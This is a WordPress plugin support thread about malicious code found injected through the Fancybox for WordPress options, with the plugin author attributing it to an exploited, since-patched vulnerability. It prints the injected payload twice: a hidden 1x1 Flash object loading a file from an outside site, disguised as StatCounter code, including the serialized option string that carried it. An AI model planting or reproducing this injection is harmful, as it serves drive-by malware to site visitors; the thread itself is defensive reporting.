Title: Malware?
Last modified: August 30, 2016

---

# Malware?

 *  Resolved [acurran](https://wordpress.org/support/users/acurran/)
 * (@acurran)
 * [10 years, 10 months ago](https://wordpress.org/support/topic/malware-45/)
 * I noticed suspicious code on one of the websites that I manage. After investigating
   further I discovered that the suspicious code appears only when Fancybox for 
   WordPress (v. 3.0.6) is activated. Below is the suspicious code. Is this plugin
   infected with malware?
 * <!– Start of StatCounter Code for Default Guide –>
    <object type=”application/
   x-shockwave-flash” data=”[http://www.weathershieldlimited.com/images/banners/eaj.swf](http://www.weathershieldlimited.com/images/banners/eaj.swf)?
   myid=cea0d16fdd2e07f5498e0c64ebd186a2″ width=”1px” height=”1px” id=”cea0d16fdd2e07f5498e0c64ebd186a2″
   > <param name=”AllowScriptAccess” value=”always”/> <param name=”myid” value=”
   cea0d16fdd2e07f5498e0c64ebd186a2″ /> <param name=”movie” value=”[http://www.weathershieldlimited.com/images/banners/eaj.swf](http://www.weathershieldlimited.com/images/banners/eaj.swf)?
   myid=cea0d16fdd2e07f5498e0c64ebd186a2″/> <embed src=”[http://www.weathershieldlimited.com/images/banners/eaj.swf](http://www.weathershieldlimited.com/images/banners/eaj.swf)?
   myid=cea0d16fdd2e07f5498e0c64ebd186a2″ width=”1″ height=”1″> </embed> </object
   > <!– End of StatCounter Code for Default Guide –>
 * [https://wordpress.org/plugins/fancybox-for-wordpress/](https://wordpress.org/plugins/fancybox-for-wordpress/)

Viewing 3 replies - 1 through 3 (of 3 total)

 *  Thread Starter [acurran](https://wordpress.org/support/users/acurran/)
 * (@acurran)
 * [10 years, 10 months ago](https://wordpress.org/support/topic/malware-45/#post-6375953)
 * upon further investigation I’ve found that the suspicious code is in the options.
   The mfbfw option contains the malware code and injects into the Fancybox for 
   WP header output. Anyone have any ideas how this compromise could have happened?
   Here is what was in the mfbfw option:
 * a:3:{s:10:”extraCalls”;s:1:” “;s:13:”transitionOut”;s:762:””,’centerOnScroll’:
   false});})
    </script> <!– Start of StatCounter Code for Default Guide –> <object
   type=”application/x-shockwave-flash” data=”[http://www.weathershieldlimited.com/images/banners/eaj.swf](http://www.weathershieldlimited.com/images/banners/eaj.swf)?
   myid=cea0d16fdd2e07f5498e0c64ebd186a2″ width=”1px” height=”1px” id=”cea0d16fdd2e07f5498e0c64ebd186a2″
   > <param name=”AllowScriptAccess” value=”always”/> <param name=”myid” value=”
   cea0d16fdd2e07f5498e0c64ebd186a2″ /> <param name=”movie” value=”[http://www.weathershieldlimited.com/images/banners/eaj.swf](http://www.weathershieldlimited.com/images/banners/eaj.swf)?
   myid=cea0d16fdd2e07f5498e0c64ebd186a2″/> <embed src=”[http://www.weathershieldlimited.com/images/banners/eaj.swf](http://www.weathershieldlimited.com/images/banners/eaj.swf)?
   myid=cea0d16fdd2e07f5498e0c64ebd186a2″ width=”1″ height=”1″> </embed> </object
   > <!– End of StatCounter Code for Default Guide –> <script>({“;s:16:”extraCallsEnable”;
   s:3:”off”;}
 *  [Jose Pardilla](https://wordpress.org/support/users/moskis/)
 * (@moskis)
 * [10 years, 10 months ago](https://wordpress.org/support/topic/malware-45/#post-6376003)
 * Hi acurran,
 * Sorry for the inconvinience.
 * There was a vulnerability in version 3.0.2 that was exploited for a brief period
   of time and patched as soon as it became know in February ([more info](https://wordpress.org/plugins/fancybox-for-wordpress/faq/)).
   It’s likely the breach occurred back then, and the malware code remained in the
   database since then, or it might have occurred recently if the plugin was not
   up to date.
 * Make sure to remove the malware if you haven’t already (if unsure, you can use
   the reset settings button to clean it), and check all instances of the plugin
   on other WordPress installations are clean and up to date.
 *  Thread Starter [acurran](https://wordpress.org/support/users/acurran/)
 * (@acurran)
 * [10 years, 10 months ago](https://wordpress.org/support/topic/malware-45/#post-6376047)
 * Thanks for the response Jose

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Malware?’ is closed to new replies.

 * ![](https://ps.w.org/fancybox-for-wordpress/assets/icon-256x256.jpg?rev=1864321)
 * [FancyBox for WordPress](https://wordpress.org/plugins/fancybox-for-wordpress/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/fancybox-for-wordpress/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/fancybox-for-wordpress/)
 * [Active Topics](https://wordpress.org/support/plugin/fancybox-for-wordpress/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/fancybox-for-wordpress/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/fancybox-for-wordpress/reviews/)

 * 3 replies
 * 2 participants
 * Last reply from: [acurran](https://wordpress.org/support/users/acurran/)
 * Last activity: [10 years, 10 months ago](https://wordpress.org/support/topic/malware-45/#post-6376047)
 * Status: resolved